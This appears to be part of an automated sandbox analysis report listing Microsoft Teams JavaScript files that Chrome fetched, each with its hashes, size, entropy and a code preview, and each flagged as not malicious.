                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[316318],{436214:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={namespace:"teamsAndChannels",locale:"en-us",translations:{activity_goto_team_title:"Go to the team",activity_tab_team_section_header:"Join teams {{firstName}} is active in",activity_tab_team_section_header_unresolved_user:"Join teams this person is active in",actor_reason_string_for_mention_team_or_channel:"{{actor}} mentioned {{channel}}",actor_reason_string_for_team_expire:"{{team_name}} is expiring soon",actor_reason_string_for_team_membership_change:"{{actor}} made you an owner of {{team_name}}",actor_reason_string_for_team_membership_change_in_a_private_or_shared_channel:"{{actor}} made you an owner of a channel",actor_reason_string_for_team_renewal:"{{team_name}} was renewed",add_guest_people_picker_header:"Add {{email}} as a guest?",add_member_close_button_aria_label:"Close",add_member_dialog_subtitle_def
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20066)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):20174
                                                                                                                                                                                                                                                                            Entropy (8bit):5.5395203125935
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:/PMieoaOaFDYto8tTN7PU1sIeJmW2CuvPH/MOOgE2bUgQ3jVrX5Pjuuw8uz11p2G:3MRoafFDYa8RtPU13fWK7x433P+8uzj9
                                                                                                                                                                                                                                                                            MD5:938A06659434BF1604CFDA704911C75F
                                                                                                                                                                                                                                                                            SHA1:C557C8DBAF7B0A50196FDC4FCAEBB77EEA37DE7F
                                                                                                                                                                                                                                                                            SHA-256:25CC246230C3CE27CC827F12331DC598E0484F8D26006A359166F93046F1114C
                                                                                                                                                                                                                                                                            SHA-512:0CE97B9E5580A7DB226994E1A5135F8AFA3A71ABA4BC75DF767A4D1894FD77D4990A8A1D9CCD500EEED928DDB0CE695E951FC36B86F6FCACD03F5BA842F24C9C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[763473,715557],{414214:(e,a,t)=>{t.d(a,{M:()=>n});var n=function(e){return{attributes:{dismissAction:{"aria-describedby":e.bodyId}}}}},146950:(e,a,t)=>{t.d(a,{l:()=>H});var n=t(513432),o=t(644525),l=t(578902),i=t(854130);var r=t(48374),s=t(754814),c=t(517822),u=t(811751),f=t(169233),d=t(140996),p=t(786394),b=t(589256),m=t(411947),h=t(164093),g=t(478304),v=t(602835),y=t(264278),k=t(585536),w=t(953291),z=t(922584),B=t(35871),q=t(205745),x=t(910889),j=t(437932);const N=e=>e?e.toDateString():"",D=e=>{const a=Date.parse(e);return a?new Date(a):null},S=(e,a)=>{const{allowTextInput:t=!1,allFocusable:o=!1,borderless:l=!1,dateTimeFormatter:i,defaultOpen:S=!1,disableAutoFocus:C=!0,firstDayOfWeek:P=c.ob.Sunday,firstWeekOfYear:_=c.zX.FirstDay,formatDate:T=N,highlightCurrentMonth:F=!1,highlightSelectedMonth:O=!1,initialPickerDate:A,inlinePopup:L=!1,isMonthPickerVisible:H=!0,maxDate:E,minD
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):125499
                                                                                                                                                                                                                                                                            Entropy (8bit):4.8759304145487
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:af4nJeG7LqUs1OnksIdyIYtNUt+rWOKnSRL1lhDytWLaGDAB0kLpVeL0wlyFZ6Yd:qnSRL1lhDytWLaGDAB0kLpV+zb3O
                                                                                                                                                                                                                                                                            MD5:B0C670E3EA088627B07D04A212B5D6F1
                                                                                                                                                                                                                                                                            SHA1:90C9A4112FB925F6AB3F8A430EA17A742E3E27D4
                                                                                                                                                                                                                                                                            SHA-256:70ABAF7F04F17417281D9A3741349AE2B8A2520CD7CE6EF040EA2F897F98812E
                                                                                                                                                                                                                                                                            SHA-512:F50D272FB95E22E67A99880531EECEA1F992A786043E01184B2325FA0E216C5395BC1CE96F80F5B5DA2ECD27310F833555AFF0817E33F302609C288B72C6A70C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/calendar-locale-en-us-60f4545e7266ba42.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[525549],{557681:(e,t,a)=>{a.r(t),a.d(t,{default:()=>n});const n={namespace:"calendar",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",aria_label_new_event_action_buttons:"Create and schedule",attendance_report_tab_text:"Attendance",breakout_rooms_tab_text:"Breakout rooms",breakout_rooms_tab_text_preview:"Breakout rooms (Preview)",broadcast_meeting_text:"Live event",broadcast_object_download_title_format:"Download {{meetingObjectName}}",broadcast_objects_recording_transcript:"Recordings & Transcripts",broadcast_objects_transcript:"Transcript",broadcast_scheduling_meeting_duration_limit_tooltip:"You can broadcast to attendees for no more than {{maxMeetingDuration}} hours",calendar_RSVP:"RSVP",calendar_accepted:"Accepted",calendar_access_error_message:"Teams is unable to access your Calendar",calendar_access_error_secondary_message:"Share the error
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46591)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):142367
                                                                                                                                                                                                                                                                            Entropy (8bit):5.430597817875451
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:PyeDWgSr6fTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGK:IgD1g/Mq5L9EveUynbBwsIccp
                                                                                                                                                                                                                                                                            MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                                                                                                                                                                                                                            SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                                                                                                                                                                                                                            SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                                                                                                                                                                                                                            SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5155)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):5263
                                                                                                                                                                                                                                                                            Entropy (8bit):5.151157042119288
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:ThGNjzj4jiRGi3wGNiU2BuPRELEYQncbQlyGJO/s4fFWVqXsJsLsGDs+1sarbHJS:9GNjzj4jiRGi3wGNi+PRELEYQcb9G6fc
                                                                                                                                                                                                                                                                            MD5:FC497DFB2A08F21B1A7D8866B7638247
                                                                                                                                                                                                                                                                            SHA1:8E1D63D4885BA36E77B9BF0E149E862830DF07BB
                                                                                                                                                                                                                                                                            SHA-256:BBCEDE435B654241D9980D457BC579FB4949EF3CEA216FC87DBE87CDF99CEB20
                                                                                                                                                                                                                                                                            SHA-512:CF04997AC8CD1E64F10013B04A20A4DC41B79FD90F00CBF5783A7802BF3DEBB8F726F83ADB65EA03E581F285121FC6A943D4FF932EA6EEB0DE036FDD6D854C99
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[711005,933386],{845155:e=>{e.exports=function(e,n,t,r,o,i,u,a){if(!e){var s;if(void 0===n)s=new Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var c=[t,r,o,i,u,a],v=0;(s=new Error(n.replace(/%s/g,(function(){return c[v++]})))).name="Invariant Violation"}throw s.framesToPop=1,s}}},711005:(e,n,t)=>{t.r(n),t.d(n,{NovaCentralizedCommandingProvider:()=>s,NovaEventingInterceptor:()=>y,NovaEventingProvider:()=>E,NovaGraphQLProvider:()=>R,graphql:()=>G,mapEventMetadata:()=>k,useFragment:()=>M,useLazyLoadQuery:()=>L,useMutation:()=>_,useNovaCentralizedCommanding:()=>c,useNovaEventing:()=>b,useNovaGraphQL:()=>z,useNovaUnmountEventing:()=>N,usePaginationFragment:()=>S,useRefetchableFragment:()=>F,useSubscription:()=>Q});var r=t(513432),o=t.n(r),i=t(845155),u=t.n(i),a=o().createContext(null),s=({
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15497)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15605
                                                                                                                                                                                                                                                                            Entropy (8bit):5.468955649965476
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:iRd8EabA2j7TJISNhQjujjO0/Iu6pAbONOzBo:m8EablPNhhKWIu6pAb26o
                                                                                                                                                                                                                                                                            MD5:0CF2320C179556FD02BCA7E4334F4C89
                                                                                                                                                                                                                                                                            SHA1:967BA55ED9AF744BB82DDD432062B437645BEF0E
                                                                                                                                                                                                                                                                            SHA-256:0EE917F8133E6C98FED6879B31C9AC36FED5BDD6BDE6BFA4EFE2ECFCC538B148
                                                                                                                                                                                                                                                                            SHA-512:E16F8D6D543704AABBED9184EDF536C736099F22699888E548ABE5509D123B7110C3116706F16E52E7CB173A712FDC1B3D7D23336D9A696C5DF54DB5240D5662
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[221963,693593],{996411:(e,t,r)=>{"use strict";r.d(t,{A:()=>p});var n=r(749045),i=r(930591),o=r(207562),s=r(717798),a=r(151820),l=r(714907),u=function(e,t){return(0,i.VF)(function(e,t){var r=-1,n=44;do{switch((0,i.Sh)(n)){case 0:38===n&&12===(0,i.se)()&&(t[r]=1),e[r]+=(0,i.Cv)(i.G1-1);break;case 2:e[r]+=(0,i.Tb)(n);break;case 4:if(44===n){e[++r]=58===(0,i.se)()?"&\f":"",t[r]=e[r].length;break}default:e[r]+=(0,o.HT)(n)}}while(n=(0,i.K2)());return e}((0,i.c4)(e),t))},c=new WeakMap,d=function(e){if("rule"===e.type&&e.parent&&e.length){for(var t=e.value,r=e.parent,n=e.column===r.column&&e.line===r.line;"rule"!==r.type;)if(!(r=r.parent))return;if((1!==e.props.length||58===t.charCodeAt(0)||c.get(r))&&!n){c.set(e,!0);for(var i=[],o=u(t,i),s=r.props,a=0,l=0;a<o.length;a++)for(var d=0;d<s.length;d++,l++)e.props[l]=i[a]?o[a].replace(/&\f/g,s[d]):s[d]+" "+o[a]}}},f=function(e){if("decl"===e.type){var
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9340)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):9448
                                                                                                                                                                                                                                                                            Entropy (8bit):4.523377967026933
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:eb1U2QgAsRxHbQsnU5SFHL4VG9TCE+gLAq:aJnUAhTL+gLAq
                                                                                                                                                                                                                                                                            MD5:7C8D3065F041AC3BB96AD2BB1F69A97D
                                                                                                                                                                                                                                                                            SHA1:90E10AB01E7ACA5F96C70479884CF6C9E96B932F
                                                                                                                                                                                                                                                                            SHA-256:2A5643B209D4B26EBC41F5BF81AB5E43F8E492F2E812ACF4702874E72C831698
                                                                                                                                                                                                                                                                            SHA-512:88C3A8887AAC6EF11F06B64014EEDEF161F216440B59CC21404D4DC6ED3248364038ADB233A294072D99522341524B5EB4598CD34E8E442057BECE4F9587C955
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/668172-b0568f91988739cd.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[668172],{668172:(a,l,Z)=>{Z.d(l,{ISY:()=>e,iFL:()=>h,FBb:()=>M,RIf:()=>m,p2G:()=>r,_PZ:()=>i,KDG:()=>v,a37:()=>A,NUc:()=>U,zPg:()=>V,hVM:()=>H,n1E:()=>d,umr:()=>u,E3C:()=>g,ao$:()=>t,nP9:()=>L,nat:()=>R,x3b:()=>C,Hee:()=>E,DRY:()=>F,G4r:()=>s,K$:()=>o,wvY:()=>n,Ppp:()=>_,tDd:()=>p,zDe:()=>f});var c=Z(693935);const e=(0,c.U)("Edit16Filled","16",["M10.53 1.76a2.62 2.62 0 1 1 3.7 3.71l-.77.78-3.71-3.7.78-.79ZM9.04 3.25 2.66 9.64c-.38.37-.64.84-.78 1.35l-.86 3.39a.5.5 0 0 0 .6.6l3.39-.86c.51-.14.98-.4 1.35-.78l6.39-6.38-3.7-3.71Z"]),h=(0,c.U)("Edit16Regular","16",["M14.24 1.76a2.62 2.62 0 0 0-3.71 0L2.66 9.64c-.38.37-.64.84-.78 1.35l-.86 3.39a.5.5 0 0 0 .6.6l3.39-.86c.51-.14.98-.4 1.35-.78l7.88-7.87a2.62 2.62 0 0 0 0-3.7Zm-3 .71a1.62 1.62 0 1 1 2.29 2.3l-.78.77-2.3-2.29.79-.78ZM9.75 3.96l2.3 2.29-6.4 6.39c-.24.24-.55.42-.89.5l-2.57.67.66-2.57c.09-.34.27-.65.51-.9l6.39-6.38Z"]),M=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1191)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1299
                                                                                                                                                                                                                                                                            Entropy (8bit):5.243624236595786
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38TMvCam+7wybSqkIozwVDhytW67C7Q42Q/KTozNKSk/qRpat4vQi6yIkY1:wp3sp3eM3Rthu7yQ4okqqbaMQi6yIdln
                                                                                                                                                                                                                                                                            MD5:C9F2D980F1163B95B19052E4A5CE0ABE
                                                                                                                                                                                                                                                                            SHA1:B5EFC49E29265B2AB334F1DFDAA43D6593C189CC
                                                                                                                                                                                                                                                                            SHA-256:ED681F88CD569BE8A4779582EA93900F349DB64DC6F34811A70A26A4314AF8CC
                                                                                                                                                                                                                                                                            SHA-512:260BD1EC7DDB69468C8D21A7F8065110AF032759F966E7FA5BB07193BF9EDBBA6ECD606961831C543DEC4086E36E5FF35FA38DB7BEF624AFE58D4E92295720E9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/224316-24c285ed94067094.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224316],{224316:(e,a,t)=>{t.d(a,{C:()=>r});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),i=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svgFlippingInRtl},s.createElement("path",{className:n()(i.Q.outline,a.outlinePart),d:"M7.64582 4.14708C7.84073 3.95147 8.15731 3.9509 8.35292 4.14582L13.8374 9.6108C14.0531 9.82574 14.0531 10.1751 13.8374 10.39L8.35292 15.855C8.15731 16.0499 7.84073 16.0493 7.64582 15.8537C7.4509 15.6581 7.45147 15.3415 7.64708 15.1466L12.8117 10.0004L7.64708 4.85418C7.45147 4.65927 7.4509 4.34269 7.64582 4.14708Z"}),s.createElement("path",{className:n()(i.Q.filled,a.filledPart),d:"M7.73271 4.20694C8.03263 3.92125 8.50737 3.93279 8.79306 4.23271L13.7944 9.48318C14.0703 9.77285 14.0703 10.2281 13.7944 10.5178L8.79306 15.7682C8.50737 16.0681 8.03263 1
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14782)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15755
                                                                                                                                                                                                                                                                            Entropy (8bit):5.366543080044668
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:DveX/4OSgcn2ZU2ZfeXOh+rF3X1qDZD4zfXdv79HU:q/9i57hU
                                                                                                                                                                                                                                                                            MD5:630831903F4BA9060856520624E34CFC
                                                                                                                                                                                                                                                                            SHA1:36DC15B9CCC3FC8EF627354BF55EF44EBD10E203
                                                                                                                                                                                                                                                                            SHA-256:BC6804D058D5BD5B24FC04E479FC8973BEF5D3EFEAFAA9C19C60A009BF0FAC0B
                                                                                                                                                                                                                                                                            SHA-512:1B0759972BBAB0B1A11D54849051E6782600B74FADB1CAF1BD58D214F484E35154907CA7F396EDB1C81A7CDC6F264D138267FB58FD89E1BA3A4D67366EE7E8B0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{519:function(e,n,s
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1658)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1766
                                                                                                                                                                                                                                                                            Entropy (8bit):5.0676511543527605
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3jXpWHv3NR2mXWfNaFWE7g5u7tScC:2NR2MWfgpT7g7
                                                                                                                                                                                                                                                                            MD5:14EA476F646BC8B6183B0E8BFE538647
                                                                                                                                                                                                                                                                            SHA1:2ED93984FCBD8478CE6D77528222886BA6C3593C
                                                                                                                                                                                                                                                                            SHA-256:2F64BF50E56476DBC7378D793C89D3B7756D479213C77C11A2EEEAA0F5779A0F
                                                                                                                                                                                                                                                                            SHA-512:345B1076831BEE8A2BD853E54366AEBBD2D8F60E6895D7466E026226650DC2AE31E3157CDC210FB2210C6E5E2EFE0C512FA444B4C960A35C1DD84F0B876D206D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/461500-40313a0738d76fdf.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[461500],{461500:(a,e,c)=>{c.d(e,{E:()=>r});var s=c(513432),l=c(395225),t=c.n(l),n=c(485529),h=c(829289),r=(0,n.Ke)({svg:function(a){var e=a.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:e.svg},s.createElement("path",{className:t()(h.Q.outline,e.outlinePart),d:"M11.5 4a1.5 1.5 0 00-3 0h-1a2.5 2.5 0 015 0H17a.5.5 0 010 1h-.554L15.15 16.23A2 2 0 0113.163 18H6.837a2 2 0 01-1.987-1.77L3.553 5H3a.5.5 0 01-.492-.41L2.5 4.5A.5.5 0 013 4h8.5zm3.938 1H4.561l1.282 11.115a1 1 0 00.994.885h6.326a1 1 0 00.993-.885L15.438 5zM8.5 7.5c.245 0 .45.155.492.359L9 7.938v6.125c0 .241-.224.437-.5.437-.245 0-.45-.155-.492-.359L8 14.062V7.939c0-.242.224-.438.5-.438zm3 0c.245 0 .45.155.492.359l.008.079v6.125c0 .241-.224.437-.5.437-.245 0-.45-.155-.492-.359L11 14.062V7.939c0-.242.224-.438.5-.438z"}),s.createElement("path",{className:t()(h.Q.fil
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (43697)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):43805
                                                                                                                                                                                                                                                                            Entropy (8bit):5.193563104572617
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:+Hi0uC0FLlYLYBwV9z/ZIZ7641CRkxPwMtMPC4r5OTjPld9dqaDDdXbNhClnYKil:mjOw1/o70KjPl/MYpDPwavNwEpABCyvY
                                                                                                                                                                                                                                                                            MD5:7180615CD9FD4DD6181DD3FA62331129
                                                                                                                                                                                                                                                                            SHA1:B2ED0F21CE2880230129958D3027800EF1BDE16A
                                                                                                                                                                                                                                                                            SHA-256:4080AA62F00EED62B77F8B29E0BA83B62FE1C94DAFB4D306BC2998F1ACE25F11
                                                                                                                                                                                                                                                                            SHA-512:B864101D15FCB41FC0548B7BD4F2843A8D2B32B166EDC9CB609F32181B1E7D8C2BEDC6FD11B61001044D0510A76CEEFAE1EBC0143FF3CB14FE8F9F3D9E7D4251
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/712284-29c943bebaa86bb2.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[712284],{712284:(e,t,n)=>{n.d(t,{Mp:()=>Ve,Hd:()=>pt,vL:()=>oe,cA:()=>be,IG:()=>ye,fp:()=>M,y$:()=>N,fH:()=>w,Sj:()=>P,Vy:()=>S,sl:()=>I,fF:()=>tt,E5:()=>f,PM:()=>et,zM:()=>ot,MS:()=>m,FR:()=>y});var r=n(513432),o=n.n(r),i=n(959022),a=n(354055);const l={display:"none"};function s({id:e,value:t}){return o().createElement("div",{id:e,style:l},t)}const c={position:"absolute",width:1,height:1,margin:-1,border:0,padding:0,overflow:"hidden",clip:"rect(0 0 0 0)",clipPath:"inset(100%)",whiteSpace:"nowrap"};function u({id:e,announcement:t}){return o().createElement("div",{id:e,style:c,role:"status","aria-live":"assertive","aria-atomic":!0},t)}const d=(0,r.createContext)(null);function f(e){const t=(0,r.useContext)(d);(0,r.useEffect)((()=>{if(!t)throw new Error("useDndMonitor must be used within a children of <DndContext>");return t(e)}),[e,t])}const h={draggable:"\n To pick up a dr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64829)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):64942
                                                                                                                                                                                                                                                                            Entropy (8bit):5.251686466766309
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:XuElkepD3LjUBjJROoqYI3SuvCO8Gu+JtQNbm7hkJv15cT1m0GV19xl4jLvfcxRe:eEf12iJtIfmkWcJot
                                                                                                                                                                                                                                                                            MD5:1A9B20A2C01784F276690F140DFEEC0D
                                                                                                                                                                                                                                                                            SHA1:A9FED7F5A57274168378968C4C2305B8ED05F297
                                                                                                                                                                                                                                                                            SHA-256:4CFAE4971A8093EE1024E95DEE5C7CD155AD1E9B2C5F2ED64896E209FAEC7B9B
                                                                                                                                                                                                                                                                            SHA-512:AF1828580267AAC6C3D31B9322ED883B6A0F0AB1754281C07DD0273D640A9F2D90D5D6DF54217F93C5F76F0C552BD401A650893CB44E6C623953361223FE9031
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/global-auth-d4ae5457f50af70f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[838201],{80134:(e,t,n)=>{n.r(t),n.d(t,{GlobalAuthService:()=>fe});var i=n(161024),a=n(417694),r=n(775251),s=n(935008),o=n(406138),c=n(802756),u=n(848020),d=n(332752),l=n(510139),h=n(211713),g=n(847431),_=n(366603),T=n(193021),A=n(553882),p=n(407404),v=n(955262),m=n(923226),b=n(191914),S=n(724801),f=n(34655),w=n(348532),I=n(565439),y=n(901456),k=n(188468),U=n(879462),R=n(319095),C=n(348773),E=n(103757),D=n(355515),M=n(734025),W=n(805809),N=n(900301);const $=(e,t,n,i,a,r,s,o,c)=>{let u=n?{"content-type":"application/json","x-ms-client-capabilities":"x-ms-mto-enabled"}:{"content-type":"application/json"};const d={"X-TS-UseCache":"false"};o&&(u={...u,...c?d:{}});const l={url:`${i}?invalidate=${+new Date(Date.now())}`,method:a,headers:u,apiName:r,authOptions:{accountId:e,source:"tenants-service-endpoints"},correlationId:t};return s&&(l.body=s),l},q=e=>{const{authenticationResource
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (26378)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):26488
                                                                                                                                                                                                                                                                            Entropy (8bit):5.477905177072842
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:yxu3KtjQqUJDUvNt0qHSoDLRMg6xCY5LBzsuKtggY5d0gIBmA1WBnzYE04QuGwZi:rqJvsq7R6xCY5LBzsuKtuFeWBnqwWRP
                                                                                                                                                                                                                                                                            MD5:2F113745AB2B26A0E660243CFEF6817F
                                                                                                                                                                                                                                                                            SHA1:5D6A60ABF6FD688FF15919B9D7BD6B00BDE41ADA
                                                                                                                                                                                                                                                                            SHA-256:2C6CDF50F6FA5E859C7DF33DCD53B21EC5B6045E131E4F2A6FAE60255F5AD3AC
                                                                                                                                                                                                                                                                            SHA-512:23357C6A6422E6FA4EC9EE2737755A845A9FDB4F235D31A3473DAB0082CB2EFD0A633B1EE24340217ECEE182F5D341E24C7C1FFD53DF72A3AE82D59F786E8C20
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/400532-1289d8a90e3671ce.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[400532],{170962:(e,t,n)=>{n.d(t,{d:()=>i,t:()=>u});var r=n(81984);const i={publicCommercialCloud:"teams.microsoft.com",gccHighCloud:"gov.teams.microsoft.us",dodCloud:"dod.teams.microsoft.us",dev:"local.teams.office.com",devLive:"local.teams.live.com",liveCloud:"teams.live.com",ag08Cloud:"https://teams.eaglex.ic.gov",ag09Cloud:"https://teams.microsoft.scloud"},o=/^(\s|\/)+|(\s|\/)+$/g,a={pathNamesLength:4,threadIDIndex:2,secondPathName:"meetup-join"},s={pathNamesLength:2,meetingIDIndex:1,firstPathName:"meet"};function l(e,t){return[i.dev,i.publicCommercialCloud].includes(t)?[i.devLive,i.liveCloud].includes(e):!![i.devLive,i.liveCloud].includes(t)&&[i.dev,i.publicCommercialCloud].includes(e)}function c(e){let t;try{t=new URL(e)}catch(e){return!1}const n=t.pathname.replace(o,"").split("/");return n.length===a.pathNamesLength&&n[1]===a.secondPathName&&!!n[a.threadIDIndex]||n.leng
                                                                                                                                                                                                                                                                            File type:HTML document, Unicode text, UTF-8 text, with very long lines (2140), with CRLF line terminators
                                                                                                                                                                                                                                                                            Entropy (8bit):3.2868701182470264
                                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                                            • HyperText Markup Language (12001/1) 29.26%
